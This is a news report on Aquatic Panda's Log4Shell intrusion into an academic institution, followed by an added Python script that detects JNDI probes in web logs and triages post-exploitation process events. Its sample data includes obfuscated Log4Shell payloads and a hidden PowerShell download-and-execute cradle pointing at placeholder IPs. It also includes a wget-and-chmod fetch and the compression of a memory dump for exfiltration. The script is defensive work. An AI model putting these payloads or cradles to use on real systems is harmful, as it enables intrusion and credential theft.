"Chinese Spies Exploit Log4Shell to Hack Major Academic Institution"

CrowdStrike's Falcon OverWatch team has discovered that China-linked cyberespionage group Aquatic Panda exploited the Log4Shell vulnerability to compromise a large academic institution. In a recent campaign, the OverWatch researchers observed Aquatic Panda using a modified version of the Log4j exploit for initial access and then carrying out post-exploitation activity, including reconnaissance and credential harvesting. According to the researchers, the attackers targeted a VMware Horizon instance that used the vulnerable Log4j library.

The intrusion began with connectivity checks: DNS lookups for a subdomain served by the Apache Tomcat service on the VMware Horizon instance. Aquatic Panda then executed multiple Linux commands on the Windows host running the Apache Tomcat service, including commands intended to deploy attacker tools hosted on remote infrastructure. From that host the adversaries performed reconnaissance to establish their privilege level and gather domain details, and attempted to stop a third-party endpoint detection and response solution. After deploying additional scripts, they attempted to run PowerShell commands to retrieve malware and three VBS files believed to make up a reverse shell. Aquatic Panda also made several attempts at credential harvesting by dumping process memory and compressing the dumps for exfiltration.

The researchers stated that the target organization was alerted to the suspicious activity immediately after detection and quickly put its incident response plan into action, patching the vulnerable software and preventing further malicious activity.
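The chain above gives a defender two concrete places to look: the Horizon front end's access logs for the Log4Shell (CVE-2021-44228) trigger string, and the Tomcat process on the Windows host for the shells, script hosts and dump-staging that followed. The Python below, an added example that is not part of the CrowdStrike report or this article, runs both checks over constructed sample data. Its attacker IPs are documentation addresses, the log lines and process events are made up for the example, and the Tomcat process names in TOMCAT_PARENTS are assumptions to be adjusted to the environment rather than something the article states.

```python
"""Log4Shell probe detection and post-exploitation triage over constructed sample data.
Added example; not code from CrowdStrike, VMware, or the article."""
import re

# --- 1. Log4Shell (CVE-2021-44228) probes in HTTP access logs -----------------------
# Attackers seldom send a bare "${jndi:ldap://...}"; they wrap it in Log4j's own
# lookups, e.g. "${${lower:j}ndi:...}" or "${${::-j}${::-n}di:...}", which a plain
# substring check misses. We unwrap those lookups step by step before matching.
_LOOKUP_RULES = [
    (re.compile(r"\$\{lower:([^{}]*)\}", re.I), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{upper:([^{}]*)\}", re.I), lambda m: m.group(1).upper()),
    # "${anything:-default}" evaluates to "default" when the lookup is unknown/empty
    (re.compile(r"\$\{[^{}]*:-([^{}]*)\}"), lambda m: m.group(1)),
]
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)

def lookup_states(text, max_rounds=20):
    """Return every intermediate form of `text` as nested lookups are collapsed.
    Matching against all states (not just the final one) defeats payloads that use
    the ":-" default syntax to make a naive normalizer erase the jndi prefix."""
    states = [text]
    for _ in range(max_rounds):
        nxt = text
        for pattern, repl in _LOOKUP_RULES:
            nxt = pattern.sub(repl, nxt)
        if nxt == text:
            break
        text = nxt
        states.append(text)
    return states

def is_jndi_probe(line):
    return any(JNDI_RE.search(s) for s in lookup_states(line))

def scan_access_log(lines):
    """Indices of log lines carrying a JNDI lookup anywhere (path, UA, headers)."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]

# Constructed sample lines (not real logs from the incident).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - "GET /portal/webclient/index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.7 - - "GET /portal/webclient/ HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - "GET /portal/webclient/ HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '198.51.100.7 - - "GET /portal/webclient/ HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://198.51.100.7/y}"',
    '198.51.100.7 - - "GET /portal/webclient/ HTTP/1.1" 200 "${jndi:ldap://198.51.100.7/z:-harmless}"',
    '10.0.0.6 - - "GET /broker/xml HTTP/1.1" 200 "${date:yyyy-MM-dd}"',  # lookup syntax, not JNDI
]

# --- 2. Post-exploitation on the Horizon host ---------------------------------------
# ASSUMPTION: Horizon's Tomcat runs under one of these image names; adjust to taste.
TOMCAT_PARENTS = {"ws_tomcatservice.exe", "tomcat9.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LINUX_TOOLING_RE = re.compile(r"(^|\s)(wget|chmod|/bin/(ba)?sh)(\s|$)")
ARCHIVER_RE = re.compile(r"\b(rar|7z|tar|makecab|compress-archive)\b", re.I)

def triage_process_event(event):
    """Map one process-creation event to the behaviours described in the report."""
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    cmd = event.get("cmdline", "")
    findings = []
    if parent in TOMCAT_PARENTS and image in SHELLS:
        findings.append("tomcat-spawned-shell")          # web server should not spawn shells
    if event.get("os", "windows") == "windows" and LINUX_TOOLING_RE.search(cmd):
        findings.append("linux-tooling-on-windows")      # Linux commands on a Windows host
    if image in SCRIPT_HOSTS and re.search(r"\.vbs\b", cmd, re.I):
        findings.append("vbs-execution")                 # VBS reverse-shell components
    if ARCHIVER_RE.search(cmd) and re.search(r"\.dmp\b", cmd, re.I):
        findings.append("memory-dump-staging")           # compressing a memory dump
    return findings

def triage_all(events):
    return {i: triage_process_event(e) for i, e in enumerate(events)}

# Constructed sample events (not telemetry from the incident).
SAMPLE_EVENTS = [
    {"parent": "ws_TomcatService.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c wget http://203.0.113.5/t -O /tmp/t && chmod +x /tmp/t"},
    {"parent": "ws_TomcatService.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')\""},
    {"parent": "powershell.exe", "image": "wscript.exe", "cmdline": r"wscript.exe C:\Windows\Temp\a.vbs"},
    {"parent": "cmd.exe", "image": "rar.exe", "cmdline": r"rar.exe a C:\Windows\Temp\out.rar C:\Windows\Temp\proc.dmp"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe Get-Service"},
]

if __name__ == "__main__":
    print("JNDI probes at log lines:", scan_access_log(SAMPLE_ACCESS_LOG))
    for i, f in triage_all(SAMPLE_EVENTS).items():
        print(i, f or "-")
```

The two halves are deliberately independent: the access-log check catches the exploit attempt whether or not it succeeded, while the process checks catch a successful one even if the JNDI string arrived in a header the web server did not log. Neither replaces patching Log4j, and the parent-process names are the piece most likely to differ between deployments.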


SecurityWeek reports: "Chinese Spies Exploit Log4Shell to Hack Major Academic Institution"
